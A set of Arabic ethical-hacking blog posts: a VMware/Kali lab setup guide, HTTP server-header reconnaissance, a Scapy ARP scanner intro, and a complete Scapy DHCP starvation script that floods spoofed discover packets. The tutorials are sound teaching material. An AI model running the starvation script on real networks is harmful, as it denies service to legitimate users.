الخميس، 3 فبراير 2022

إنشاء مختبر خاص للإختراق على جهازك بإستخدام VMware

 بسم الله الرحمن الرحيم

اكبر مشكلة عند تعلم الأختراق الأخلاقي (Ethical Hacking) هو عدم وجود تطبيق عملي مما يؤدي إلى تحويل كل ما تتعلمه إلى مجرد مقالات بدون أي فائدة , فالأختراق علم تطبيقي و لا يمكن اتقانه و تطوير مهاراتك بدون أن تقوم بتجريب ما تتعلمه , في بداياتي كنت أتخيل أنه يجب أن اتملك خوادم متطورة لكي اتقوم بالتطبيق عليها , لكن مع البحث حصلت طريقة بسيطة تمكنك من انشاء مختبر خاص بك على جهاز واحد و بشكل قانوني , و هنا سوف اشرح لك هذه الطريقة بطريقة مبسطة يصل للذين في أول الطريق , حيث سوف نستخدم خاصية Virtualization التي ستمكنك من تشغيل أكثر من نظام تشغيل على جهازك كما سوف اضغط روابط لمواقع توفر اجهزة افتراضية لتطبق الأختراق بشكل عملي و قانوني .


1. تنزيل برنامج Vmware Workstation Player

من هذا الرابط قم بتنزيل البرنامج من الرابط (https://www.vmware.com/products/workstation-player.html) , ثم قم بتشغيل برنامج التثبيت .



قم بالموافقة على اتفاقية الاستخدام و اضغط "Next"


في هذه النافذة دع الاختيارات على قيمها الافتراضية


اضغط على زر "Install"


عند الانتهاء سوف تظهر لك هذه النافذة , أضغط Finish


برنامج VMware Workstation player مجاني للإستخدام غير التجاري , لذا سوف نستخدم هذا الاختيار الافتراضي .


بعد نهاية التثبيت قم بتشغيل البرنامج من الايقونة على سطح المكتب , ستظهر لك نافذة مشابه لهذه عند التشغيل .


في بعض الحالات قد تواجه هذه الرسالة 

https://preview.redd.it/eclrryr4bc081.png?width=320&format=png&auto=webp&s=33dedf99a4ea8960b31e5b98fb0847d8c136b9ef 

و عند ضغط زر الموافقة قد تظهر لك الرسالة التالية 

https://preview.redd.it/q5z99nv5bc081.png?width=320&format=png&auto=webp&s=54a825def9185ca900f10dc5c38c28d0b2a40df6 

 

و لهذا سببين , السبب الأول هو عدم تمكين ميزة Virtualization من BIOS , و للتفعيل اعد تشغيل الجهاز و عند بداية التشغيل قبل ظهور شعار ويندوز ستظهر لك الشاشة التالية (بحسب الشركة المصنعة لجهازك )


لدخول للنظام BIOS يجب عليك أن تضغط على زر معين , في شاشة البداية يعرض لك ما هو , في بعض الحالات قد يكون F1 أو F11 , لذا يفضل بأن تراقب الشاشة و تنتبه للزر المطلوب .

هذا الشرح يعتمد على نوع جهازك , لكن سوف اتبع الخطوات بحسب جهازي كمثال تستخدمه للوصول للقائمة :


 تستطيع الحركة بين نوافذ التوبيت في Bios باستخدام الأسهم في لوحة المفاتيح , و انتقل لنافذة التوبيب Security , ثم إلى Virtualization , ثم أضغط على Enter .

قم بتفعيل بتغير Intel (R) Virtualization Technology و Intel (R) VT-d Feature , اضغط على الزر Enter لتغير القيم

و لحفظ الأعدادات قم بالخروج من قائمة Virtualization بعد تغير القيم باستخدام Esc  ثم اذهب للقائمة  Restart ثم اختر Exit Saving Change , سوف يتم اعادة تشغيل البرنامج .


 كما تلاحظ هنالك في اسفل الشاشة التعليمات التي تحتاجها لتتنقل في نظام BIOS و حفظ الأعدادات , بالنسبة لمعالجات AMD فالفكرة متشابه و لكن الاسم في هذه الحالة يكون AMD-V .


السبب الثاني لظهور رسالة الخطأ في VMWare player هي تفعيل Microsoft hyper-v و هو برنامج منافس لبرنامج Vmware من انتاج شركة مايكروسوفت لذا هو مدمج مع نظام ويندوز 10 ( نسخة Professional و Server ) و لتعطيله من نظام ويندوز فقط قم بالدخول لـ"Turn Windows Features On or Off"


ثم قم بتعطيل Hyper-v ثم اضغط على موافق "OK"

سيتم تعطيل Hyper-v ثم اعادة تشغيل الجهاز , كما يجب ايضا تعطيل Virtual Machine platfrom 


تعطيل هذه الخدمات سوف يؤدي إلى تحول خاصية Windows sub system إلى الإصدارة الأولى , و تعطيل Hyper-v .

هنا قد تتساءل لماذا لا اقوم باستخدام Hyper-v بدل Vmware player ؟

هذا سؤال منطقي , و بصراحة تستطيع استخدام Hyper-v لتشغيل أنظمة لينكس على ويندوز و لكن يتميز Vmware بأنه يحتوي على دعم افضل للعديد من الأنظمة , و من تجربتي الشخصية فـ Hyper-v يعمل بأمتياز مع انظمة ويندوز الحديثة و لكن لديه مشاكل مع الأنظمة الأخرى فمن المشاكل التي واجهتني توقف الماوس بشكل فجائي بدون سبب , كما أن هنالك خاصية لا تتواجد في Hyper-v وهي خاصية الوصول إلى أجهزة الموصولة بمنفذ USB مباشرة و هذه الخاصية مفيدة جدا خاصة عند وصل جهاز تخزين أو أجهزة شبكة لاسلكية .


2.الحصول على صورة نظام Kali Linux الخاصة بــ(VMware workstation Player)

لتنزيل صورة نظام كالي لينكس الخاصة ببرنامج VMware أذهب للرابط  و قم بتنزيل الملف من الصفحة 


طبعا سوف نستخدم نسخة 64 بت , سوف يكون الجهاز الأفتراضي في ملف مضغوط بصيغة 7z لذا سوف نستخدم برنامج 7-Zip المجاني .

قم بتنزيل البرنامج من الرابط (  https://www.7-zip.org ) و من الصفحة الرئيسية اختر نسخة bit Windows x64


بعد التنزيل قم بتشغيل الملف التنفيذي , ستظهر لك نافذة كالتالي :


قم بتذكر المسار الذي سوف يتم تثبيت البرنامج فيه , فسوف نحتاجه لاحقا , ثم أضغط Install , في حالة نجاح التثبيت سوف تظهر لك نافذة مشابه للتالي.


من متصفح المجلدات اذهب للمسار المجلد الذي تم تثبيت البرنامج فيه , و شغل البرنامج 7zFM


ستظهر لك الواجهة الرسومية لبرنامج 7Zip كالتالي


من الأختيارات أختر الزر Computer ثم اختر المسار الذي يوجد فيه الملف


عندما تصل إلى الملف قم بتأشير على الملف ثم أضغط Extract




قم باختيار مسار الذي سوف يتم فك ضغط الملف فيه



بعد ضغط زر الموافقة "OK" سوف يظهر لك النافذة كالتالي :


بعد انتهاء فك ضغط الملفات قم بتشغيل برنامج VMWare Workstation player , ثم من النافذة الأساسية أختر Open a Virtual Machine


سوف يظهر لك نافذة اختيار الملف اذهب إلى المجلد الذي انشىء بعد فقط ضغط الملفات 


لن يظهر لك غير ملف أعدادات الجهاز الأفتراضي و هو المطلوب قم بأختياره و اضغط Open , بهذه الخطوة تكون قمت بأضافة النظام .

 

قبل أن نبدأ في تشغيل النظام هنالك بعض الإعدادت التي يفضل بأن نقوم بتغيرها , مثل حجم الذاكرة و طريقة توصيل الشبكة , لذا سوف نختار "Edit virtual machine settings" 


الجهاز الافتراضي يأتي بذاكرة بحجم 2 جيجا و لكن على افضل لو تكون على الأقل 6 جيجا , طبعا يجب أن تتأكد من مواصفات جهازك فالذاكرة سوف تأخذ من النظام المضيف .

و الإن شرح بسيط للإعدادات الشبكة الإساسية في برنامج VMWare Workstation player

  1. Bridged : يتم شبك النظام ببطاقة الشبكة على المضيف بشكل مباشر , لذا يكون للجهاز الافتراضي عنوان انترنت منفصل .
  2. NAT : يقوم النظام المضيف للجهاز الافتراضي بدور الوسيط ما بينه و بين الشبكة .
  3. Host-only : لا يمكن للجهاز الافتراضي التواصل إلا مع الجهاز المضيف و الإجهزة الأفتراضية الأخرى التي تحمل نفس أعداد الشبكة .
  4.  Custom : تستطيع انشاء شبكة تجمع مجموعة من الأجهزة الأفتراضية بمعزل عن الجهاز المضيف أو الشبكة الخارجية , هذا الأختيار مفيد جدا في حالة تنزيل جهاز افتراضي غير موثوق , أو تجريب برنامج غير معروف المصدر .


و الإن لتشغيل الجهاز الافتراضي من البرنامج فقط أضغط على احد الأزار الموضحين في الصورة بعد اختيار الجهاز الافتراضي 



ستظهر لك نافذ كالتالي :
 


اسم المستخدم و كلمة السر هي kali  , لكي تظهر الماوس من النافذة الخاصة بالجهاز الأفتراضي أضغط الزرين CTRL+SHIFT , و الأن بعدما أنتهينا من اعداد VMware و تثبت الجهاز الذي سوف نستخدمه في الاختراق سوف ننتقل إلى كيفية الحصول على أجهزة افتراضية لتجريب و التدريب على الأختراق .


3. الحصول على أجهزة أفتراضية لتدريب على الأختراق
 
 
للإنظمة لينكس و برامج الويب تستطيع استخدام موقع Vulnerable by Design الذي يحتوي على مئات من الإجهزة الأفتراضية التي تتدرج من مستوى المبتدئين إلى مستوى المحترفين .
 

قم بتنزيل الأجهزة الأفتراضية و إبدأ في التجريب , لكن لا تنسى أن تقوم بوضع جهاز كالي لينكس الأفتراضي و الأجهزة التي تحتوي على الثغرات في شبكة خاصة كما شرحت من قبل , لأن هذه الأجهزة الافتراضية من مصدر غير موثوق و مجهول .

للاسف الأجهزة الافتراضية الخاصة بنظام ويندوز صعب الحصول عليها , لذا تستطيع إنشاء جهاز افتراضي فيه ثغرات للتجريب , و بحاول ابحث عن أجهزة افتراضية و بحدث الموضوع .

 

في النهاية يجب أن أنوه أنه يوجد برامج تقوم بنفس عمل VMware و مجانية و مفتوحة المصدر مثل Virtual Box , لك اعتمد على برنامج VMware لإنه سهل الأستخدام و بسيط .







الجمعة، 15 أكتوبر 2021

سيرفر الويب و خطورة عرض الإصدارة

 بسم الله الرحمن الرحيم

اول خطوة يبتدأ بها الهاكر هي جمع المعلومات (information gathering) كل معلومة مهما كانت تبدو لك بسيطة قد تكون هي السبب في عملية الأختراق , و هنا سوف نأخذ مثلاً لا يحتاج لبرنامج متخصص أو طرق معقدة بل أنه بسبب الجهل أو التكاسل من مدير النظام يقدم السيرفر هذه المعلومة على طبق من ذهب .


  • قبل أن نبدأ 

    يجب ان يكون لديك فكرة عن برتوكول HTTP و متصفح Firefox مثبت على جهازك , للحصول على فكرة عن البرتوكول تستطيع قراءة هذا الشرح .

  • ما هي المعلومة التي سنحصل عليه ؟

    سوف نحصل على نوع و أصدارة البرنامج الخاص بالسيرفر .

  • ما هي الفائدة من هذه المعلومة ؟ 

    نوع و اصدارة البرنامج تمكنك من البحث عن الثغرات المكتشفة لهذا البرنامج , كما تكشف نوع نظام التشغيل فمثلا سيرفر من النوع IIS سيعمل على نظام ويندوز و سيرفر من نوع Apache سيكون في الأغلب على نظام لينكس أو Freebsd .
     
  • كيف الحصول على معلومات السيرفر ؟

    هنالك أكثر من طريقة و لكن سوف نعتمد على متصفح Firefox في هذه التدوينة , من المتصفح أضغط على زر Alt  ستظهر لك قوائم المتصفح أختر القائمة Tools ثم Browser Tools ثم أضغط Web Developer Tools .
     

    في اسفل الشاشة ستظهر لك ادوات مطور الويب أختر من Network :
     
     
    قم بالذهاب إلى الموقع و ستظهر لك الطلبات التي أرسلت إلى الموقع كالتالي :
     

     
    أختر إي طلب من الذي تمت إلى الموقع ستظهر لك معلومات تفصيلية أختر Headers , و انزل إلى Response Header و ابحث عن السطر الذي يبتدأ بكلمة Server , هذا نوع السيرفر :


    لمثالنا هذا استخدمنا الموقع example.com و لمثالنا فنوع السيرفر ESC , لكن في بعض الحالات ستجد معلومات مثل الإصدارة و نوع النظام .


  • الخاتمة

    كل البرامج تظهر فيها ثغرات مع مرور الوقت لذا عرض نوع السيرفر و إصدارته يسهل عملية البحث عن الثغرات كما يمكن المخترق من التعرف على نوع نظام التشغيل , لذا يجب على المسؤول عن السيرفرات أخفاء هذه المعلومات لتجنب عملية الهجوم العشوائي التي تمسح الأنترنت عن نوع من السيرفرات التي تحتوي على ثغرة معينة .

الاثنين، 11 أكتوبر 2021

بايثون للشبكات : تعطيل برتوكول DHCP بواسطة Scapy

بسم الله الرحمن الرحيم

 برتوكول Dynamic Host Control Protocol أو اختصارا DHCP تتلخص مهمته الأساسية في توفير عناوين الأنترنت (IP Address) بشكل ألي للأجهزة المتصلة بالشبكة , البرتوكول مفيد جدا و مستخدم بشكل كبير في الشبكات المنزلية .

في هذه التدوينة سوف نعرض شرح بسيط لخوازمية البرتوكول و تطبيق عملي لهجوم حجب الخدمة أو DDOS و الذي يعرف بهجوم DHCP starvation بواسطة مكتبة scapy.

قبل ان نبدأ لتثبيت المكتبة في ويندوز و لينكس اتبع الخطوات في هذا التدوينة .

 

  • برتوكول DHCP 

    برتوكول DHCP برتوكول يقع في طبقة التطبيقات في تمثيل OSI الخاص بالشبكات 
     
    يستخدم البرتوكول UDP على المنفذ 67 لرسائل الخادم (Server) و المنفذ  68 لرسائل العميل (Client) .

    تتلخص عملية الاتصال بالخطوات التالية :
     
    مصدر الصورة :https://en.wikipedia.org
     
    1. يقوم العميل بأرسال حزمة انترنت (Internet Packet) تحمل العنوان الخاص بالمرسل هو عنوان الأنترنت 0.0.0.0 و عنوان المستقبل 255.255.255.255 هذا العنوان يعني أنه سوف يتم ارسال هذه الحزمة للجميع , اما عن اطار الأيثرنت الذي يحتوي على هذه الحزمة فالعنوان الفيزيائي للمرسل هو الخاص ببطاقة الشبكة و العنوان المرسل إليه يكون العنوان الخاص ff:ff:ff:ff:ff:ff الذي يعني أن هذا الأطار سيتم بثه إلى جميع الأجهزة في الشبكة , في حالة عدم وجود استجابة لهذه الرسالة سيتم تجديد ارسالها على الشبكة إلى أن يحصل رد .
    2. عند وصول الطلب إلى الخادم يرد برسالة تعرض عنوان الانترنت المقترح .
    3. يرد العميل باستخدام رسالة طلب عنوان ( Request ) تحتوي على العنوان الذي تم اختياره و عنوان الخادم , يستطيع العميل استقبال رسائل من اكثر من خادم لكن يجب ان يرد على خادم واحد فقط , لذا يحتوي على معرف الخادم و عنوان الانترنت الخاص به , لأنه في هذه المرحلة لن يكون للعميل عنوان انترنت فسيتم بث هذه الرسالة للكل على نفس العنوان كما في الخطوة الأولى .
    4. المرحلة الأخيرة يرسل الخادم رسالة تبين وقت صلاحية العنوان قبل أن يحتاج الجهاز لطلب عنوان مرة أخرى و هذا الوقت يعتمد على اعدادات الخادم كما يتم توفير اي معلومات اضافية طلبها العميل في مرحلة الأكتشاف مثل عنوانين خوادم WINE و DNS و NTP و عنوان Gateway .


  • مزايا و العيوب في برتوكول DHCP

    برتوكول DHCP مفيد جدا و مستخدم بشكل كبير , تخيل فقط كمية الجهد للإعداد كل جهاز في شبكة تتغير فيها الأجهزة بشكل دائم أو تخيل تكليف شخص غير متخصص بوضع هذه الإعدادت احتمال حصول خطأ كبير جدا , لكن هناك عيب كبير في هذا البرتوكول و هو عدم وجود أي الية لتحكم في وصول المستخدم فأي طلب للحصول على عنوان سوف يتم تنفيذه من دون التحقق من صحة و مصداقية الطلب , ماذا لو قام شخص بتوليد طلبات للحصول على جميع العنوانين في الشبكة و حجزها بشكل دائما , لن يجد أي جهاز حقيقي يحاول الأتصال أي عنوان مما يؤدي لعدم قدرته على الاتصال و هذا ما سوف نستخدمه في هذه التدونية , بكل بساطة سوف نستخدم بايثون لتوليد عدد كبير من الطلبات المزيفة .




    • الأدوات

سوف نستخدم في برمجتنا لهذا السكريبت مكتبة  Scapy التي تعمل على لغة بايثون لكي تتعرف على طريقة التثبيت قم بالدخول على هذه التدوينة .

هناك ايضا شرح لموجه الأوامر الخاص بالمكتبة Scapy الذي سنتخدمه ايضا لشرح الكيفية التي سيعمل بها البرنامج


  • خطوة بخطوة

    من موجه التفاعلي للمكتبة Scapy بنبدأ في الطبقة الأولى من الأطار (frame) و هو أطار Ethernet :
     
    pkt = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")
    
     
    الأطار بسيط فقط حددنا العنوان المرسل له وهو ff:ff:ff:ff:ff:ff و هو العنوان الخاص بعملية Broadcast في برتوكول Ethernet أما العنوان الخاص بالمرسل فاستخدمنا الدالة RandMAC تولد هذه الدالة عنوان فيزيائي عشوائي , نحتاج هنا لإرسال العديد من الطلبات بعنوان غير حقيقة و هنا هذه الدالة ستقوم بالعمل و الأن إلى الطبقة الثانية .
     
    pkt = pkt / IP(src="0.0.0.0",dst="255.255.255.255")
    
     
     الطبقة الثانية هي برتوكول IP سوف نحدد فقط العنوان المرسل كعنوان المرسل سيكون العنوان الخاص 0.0.0.0 , هذا العنوان يستخدم لدلالة على عدم وجود عنوان ففي هذه المرحلة لا يملك الجهاز عنوان انترنت , اما العنوان الخاص بالمرسل إليه 255.255.255.255 فهو عنوان خاص بعملية الارسال لجميع الأجهزة أو broadcast .

    pkt = pkt / UDP(sport=68,dport=67)
    
     
     و الأن إلى انشاء حزمة برتوكول UDP  و تحديد المنفذ المحلي برقم 68 و المنفذ الهدف بالرقم 67 , فقط هذا ما نحتاج له .

    pkt = pkt / BOOTP(op=1,chaddr=RandMAC())
    
     
     هنا سنضيف طبقة خاصة ببرتوكول BOOTP , هذا البرتوكول اقدم من برتوكول DHCP و يقول بنفس العمل , لكن كان يستخدم لعملية اعطاء الأجهزة عديمة الأقراص عنوان انترنت و تحميل النظام من الشبكة و هو يعمل على نفس المنافذ الذي يستخدمها برتوكول DHCP لذا لا يمكن ان يعملا على نفس الجهاز , المتغير op يحتمل قيمتين فقط 1 و 2 القيمة 1 ترمز لـ BOOTREQUEST اي طلب برتوكول BOOTP و القيمة 2 ترمز لــ
    BOOTREPLY  اي رد على طلب خاص بهذا البرتوكول , أما المتغير chaddr فهو اختصار لـ Client Hardware Address أي العنوان الفيزيائي للعميل و هنا استخدمنا ايضا الدالة RandMAC لتوليد عنوانين عشوائية .
     

    pkt = pkt / DHCP(options=[('message-type','discover'),('end')])
    
     
     
    المعلومات التي ترسل المطلوبة و التي يوفرها الخادم كلهما يرسل عن طريق رقم يدل على الأختيار Options , لكن scapy تستخدم قيمة نصية تدل على نوع الأختيار ثم قيمته و يتم وضعها في tuple كمثالنا ('message-type','discover') أما التمثيل في الحزمة فيكون قيمة رقمية ثم طول القيمة بالبايت ثم القيمة , و في نهاية الحزمة يجب وضع end و التي هي عبارة عن القيمة ff أو بالتمثيل العشري 255 .

    'طبعا scapy يقوم بالاهتمام بالكثير من التفاصيل بدل ترك المستخدم يهتم بكل شيء و لكي تعرض الحزمة التي قمنا بأنشاءها استخدم الدالة show2 كالتالي :


     
    ###[ Ethernet ]### 
      dst= ff:ff:ff:ff:ff:ff
      src= 61:bf:93:29:c6:e5
      type= IPv4
    ###[ IP ]### 
         version= 4
         ihl= 5
         tos= 0x0
         len= 272
         id= 1
         flags= 
         frag= 0
         ttl= 64
         proto= udp
         chksum= 0x79dd
         src= 0.0.0.0
         dst= 255.255.255.255
         \options\
    ###[ UDP ]### 
            sport= bootpc
            dport= bootps
            len= 252
            chksum= 0xea44
    ###[ BOOTP ]### 
               op= BOOTREQUEST
               htype= 1
               hlen= 6
               hops= 0
               xid= 0
               secs= 0
               flags= 
               ciaddr= 0.0.0.0
               yiaddr= 0.0.0.0
               siaddr= 0.0.0.0
               giaddr= 0.0.0.0
               chaddr= b'e5:a4:e8:d9:77:e'
               sname= b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
               file= b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
               options= 'c\x82Sc'
    ###[ DHCP options ]### 
                  options= [message-type=discover end]
    
     
 
و الأن قبل أن نبدأ بالارسال هنالك مشكلة scapy دائما يتأكد من عنوان المرسل إليه عند وصول الرد و في الرسالة التي نرسلها سيكون العنوان 255.255.255.255 و لكن الرد سيحمل عنوان الخادم الخاص ببرتوكول DHCP لذا يجب ان نعطل هذه الخاصية باستخدام هذا السطر :
 
conf.checkIPaddr = False
 
 
 و الأن إلى السطر الأخير و هو سطر الأرسال :
 
sendp(pkt,loop=1)
 
 في حالة عدم تحديد المنفذ او ما يسمى بــ" interface " سيتم الأرسال على المنفذ الافتراضي الذي تستطيع معرفته بواسطة :
 
conf.iface
 
و لتحديد المنفذ في امر الأرسال استخدم المتغير iface في امر الأرسال كالتالي :
 
sendp(pkt,iface="eth0",loop=1)
 
 و هذا هو نتيجة تنفيذ البرنامج على رواتر سيسكو عند تنفيذ الأمر الخاص بعرض العنوانين المحجوزة في خادم DHCP :

show ip dhcp binding



تلاحظ بأن العنوانين جميعها محجوزة لذا أذا حاول أي جهاز حقيقي طلب عنوان من خادم DHCP لين يقدم له الخادم عنوان لعدم توافره لكن يأتي السؤال هنا لماذا يتم حجز هذه العناوين برغم أنه لن تتكمل عملية المصادقة فقط قمنا بأرسال طلب عنوان فقط , ببساطة يقوم الخادم بحجز العنوان مباشرة لأنه يقوم بأرسال العنوان في رسالة DHCP Offering بحسب تصميم البرتوكول , لذا في حالة وقف الهجوم سوف يتم تحرير العنوانين في وقت قصير لعدم اكتمال عملية حجز العنوان .

  • السكريبت المكتمل 


     

    * تم وضع صورة للنص البرمجي بسبب وجود مشكلة في النص حيث أن العلامة \ تظهر في اول السطر بدل أن تكون في أخر كل سطر .
#!/usr/bin/python3
from scapy.all import conf,Ether,IP,RandMAC,UDP,BOOTP,DHCP,sendp

conf.checkIPaddr = False


dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff",src=RandMAC()) \
/IP(src="0.0.0.0",dst="255.255.255.255") \
/UDP(sport=68,dport=67) \
/BOOTP(op=1,chaddr=RandMAC()) \
/DHCP(options=[('message-type','discover'),('end')])

#غير الواجهة بحسب جهازك
sendp(dhcp_discover,iface="eth0",loop=1,verbose=1)
 
 
 
  • المصادر 


    لقد أعتمدت في كتابة هذا الموضوع على هذا الفيديو و انصح بمشاهدته و متابعة هذا القناة:


 و النهاية  ان شاء الله يكون الشرح بسيط و مفيد و إذا في خطأ او أضافة أو سؤال تقد تتواصل معي على المدونة مباشرة بالتعليقات .

 
 

الاثنين، 20 سبتمبر 2021

بايثون للشبكات : برنامج يستخدم برتوكول ARP لعرض جميع الأجهزة المتصلة على الشبكة المحلية

 بسم الله الرحمن الرحيم

الحصول على عنوان الأنترنت الخاص بالإجهزة على الشبكة هو الخطوة الأولى لكي تبدأ عملية اكتشاف نقاط الضعف في هذه الأجهزة , و في هذه التدوينة سوف نبني برنامج بايثون يقوم بهذه المهمة , و هنا يأتي السؤال لماذا ؟ , ألا يوجد برامج تقوم بهذا العمل و تغني عن هذا المجهود , الأجابة نعم  لكن افضل طريقة للتعلم هو التطبيق, سنبدأ أولا بشرح نظري للطريقة التي سنستخدمها مع نظرة لبرتوكول ARP , ثم تثبيت مكتبة Scapy في ويندوز و لينكس و أخيرا سوف نقوم بكتابة سكريبت يقوم باستخدام بروتوكول ARP لكشف الأجهزة المتصلة .


  • نظرة لبرتوكول ARP :

Address Resolution Protocol أو أختصاراً (ARP) , هو برتوكول يهدف لعرض العنوانين الفزيائية أو ما يسمى بعنوان MAC المرتبط بعنوان الأنترنت ( IP Address ) و العكس صحيح .

لنفترض بأنك تريد الاتصال بكمبيوتر يوجد على الشبكة المحلية و لديك عنوان الأنترنت (IP) فتحصل الخطوات التالية :
  1. سيبحث جهازك عن العنوان الفزيائي في جدول العناوين الموجود على النظام  والمسمى ARP Caching Table .
  2. في حالة وجود هذا العنوان في الجدول سوف يتم الأعتماد عليه بدون ارسال طلب ARP .
  3. في حالة عدم وجود العنوان سوف يرسل الجهاز طلب ARP Request لجميع الأجهزة المتصلة (Broadcast message).
  4. جهاز الــ"switch" سيقوم بأرسال هذه الرسالة لجميع المنافذ النشطة ما عدا المنفذ الذي تم منه الأرسال .
  5. عند وصول الرسالة إلى الجهاز الذي يحمل عنوان الأنترنت المطابق سوف يرد برسالة تحمل عنوانه الفيزيائي .
  6. في حالة عدم وجود جهاز يحمل عنوان الأنترنت على الشبكة المحلية سوف ينتهي وقت انتظار الرد و يفترض الجهاز المرسل بأنه لا وجود لهذا الجهاز .

هذه صورة لطلب ARP Request من برنامج wireshark , تلاحظ بساطة البروتوكول :


 الرد في برتوكول يكون العنوان البديل لعنوان البث (Broadcast ) و سوف تكون الرسالة موجهة بشكل  مباشر للمرسل (Unicast) ونوع الرسالة Opcode هو Reply .


هذا شرح مبسط جدا لهذا البرتوكول , و السبب لوجوده بأن الرسائل داخل الشبكة المحلية يتم تبدلها بواسطة برتوكول Ethernet  الذي يعمل في طبقة ربط البيانات (Data Link) والذي يستخدم العنوان الفيزيائي للاتصال  , كما يظهر لك نموذج OSI .


هنا قد تتساءل لماذا لا نستخدم برتوكول ICMP و اشهر تطبيقاته و هو الأمر Ping في انظمة ويندوز و لينكس , السبب هو أن الكثير من الأجهزة مثل الهواتف الذكية و جدران النار تحظر هذا البرتوكول و تقوم بمنع الرد على رسائله, أما في حالة برتوكول ARP فمن الصعب تعطيله لأنه اساسي لعملية الأتصال كما رأيت .


  • تثبيت مكتبة Scapy 

مكتبة Scapy هي مكتبة متخصصة في بناء و ارسال حزم شبكات معدلة و ارسالها عبر الشبكة , امكانيات هذه المكتبة كبيرة جداٌ و تعطي المبرمج امكانيات رائعة .

التثبيت في نظام لينكس :

لمستخدمي توزيعة Ubuntu أو اي توزيعة تستخدم مدير الحزم Apt فقط اكتب الأمر في موجه الأوامر :

sudo apt-get install scapy


التثبيت في نظام ويندوز :

لتثبيت في ويندوز سوف نستخدم توزيعة البايثون Anaconda , هذه التوزيعة من الأشهر في مجال علم البيانات ( Data sciences ) و ما يميزها هو سهولة تثبيت المكتبات و وجود محرر ممتاز لذا سوف نستخدمها في حالتنا .

  1. قم بتنزيل التوزيعة من الموقع الرسمي ( https://www.anaconda.com/products/individual-d ) .
     
    2. اتبع خطوات التثبيت 
     



    3. تأكد من تفعيل خيار أضافة مجلد التثبيت إلى متغير مسار البرامج ( PATH )


 4. بعد أنتهاء التثبيت قم بتشغيل برنامج Anconda من القائمة Start 




5. عندما ينتهي تحميل البرنامج ستظر لم نافذة كالتالي :



6. أختر من القائمة على اليمين Enviroments :





7. و لتحديث قائمة المكتبات أضغط "Update Index" و غير العرض إلى جميع المكتبات ثم أبحث عن المكتبة scapy و اضغط في اسفل المكتبة على الخيار Apply :

 
للتأكد من نجاح التثبيت قم بتشغيل موجه الأوامر الخاص بالمكتبة Scapy في نظام ويندوز من القائمة Start أكتب في مربع البحث أكتب "Cmd" و أختر "Run as Administrator" :
 

 اكتب في موجه الأوامر Scapy أذا ظهر لك موجه الأوامر كالتالي فيعني أننا نجحنا في التثبيت :


في نظام ليكنس فقط أكتب الأمر كالتالي , يجب أن يظهر لك موجه الأوامر مشابه لما في ويندوز :

sudo scapy


  • الموجه التفاعلي لمكتبة Scapy

    قبل أن نكتب السكريبت في بايثون سوف نستغل خاصية الموجه الأوامر في Scapy و الذي هو عبارة عن موجه python مع تفعيل المكتبة Scapy.
     
    هذه الخاصية اعتبرها من الأمكانيات الممتازة حيث يمكن تجريب و التعديل بشكل مباشر و سريع لكي تتأكد من نجاح برنامجك.

    لنبدأ أولا بأنشاء الاساس في أطار الشبكة الخاصة ببرتوكول ARP , البرتوكول مبنى و مضمن في أطار ايثرنت (Ethernet Frame) .
    * يجب أن أنوه بأن برتوكول ARP مستخدم في أكثر من أطار للشبكات , ولكن للشبكات المحلية الأطار المستخدم هو ايثرنت .
     
    و لكن قبل أن ننشىء هنا عرض مبسط لمكونات الإطار و شرح لها :

    المصدر :https://commons.wikimedia.org/wiki/File:Ethernet_II_Frame_Structure.png


    هذه الصورة لإطار ايثرنت ( اقصد بالإطار Frame و هي الكلمة المستخدمة للحزم في الطبقة الثانية من OSI للشبكات ) و الشرح ببساطة :

    1. Preamble : هو مجموعة 56 بايت تستخدم لمزامنة ساعة المستقبل على نفس ساعة المرسل ( Clock Sync )  و هنا لا نعني التوقيت كالوقت و التاريخ , هذا المصطلح يخص الإلكترونيات , و هذا النطاق يخص الطبقة الأولى من من OSI وسوف اتجنب شرحها لكي لا أعقد الموضوع .
    2. SFD : اختصار لــ  Start Frame Delimiter بداية البيانات الخاص بالإطار أيضا يقع في الطبقة الأولى من OSI .
    3. Destination Address : العنوان الفيزيائي للبطاقة الشبكة (Mac Address ) المرسل لها البيانات يتكون من 6 بايتات يتم عرضه بتمثيل Hexadecimal و فصل بين كل بايت بـ ":" .
    4.  Source Address : العنوان الفيزيائي للبطاقة الشبكة (Mac Address ) المرسل منها البيانات يتكون من 6 بايتات ايضا و يتبع نفس التمثيل كما في العنوان المرسل له .
    5. النوع : بحسب البرتوكول المستخدم في حالتنا سيكون ARP و سيحمل القيمة 0x0806.
    6.  البيانات : البيانات الفعلية
    7. FCS : هذه القيمة تمثل ناتج معادلة تأكد للمرسل أذا حدث خطأ في نقل البيانات , حيث يتم تنفيذ نفس المعادلة في المرسل و المستقبل و في حالة أختلاف القيمة في المرسل يتم أفتراض حصول خطأ .


    في Scapy يمكن الوصول إلى العنوان المرسل و المستقبل و البيانات و النوع , و FCS متروكين للنظام أما Preamble و SFD فهما متروكين لبطاقة الشبكة .
     
    لإنشاء أطار Ethernet في Scapy فقط استخدم الأمر التالي الذي سوف ينشأ أطار Ethernet و يسنده إلى المتغير الخاص بنا:
myFrame = Ether()

لعرض مجتويات هذا الأطار فقط أستخدم الدالة show كالتالي :

myFrame.show()

سيعرض لك القيم التي تستطيع تغيرها في الإطار كالتالي :
###[ Ethernet ]###
dst= ff:ff:ff:ff:ff:ff
src= 11:36:12:54:14:49
type= 0x9000


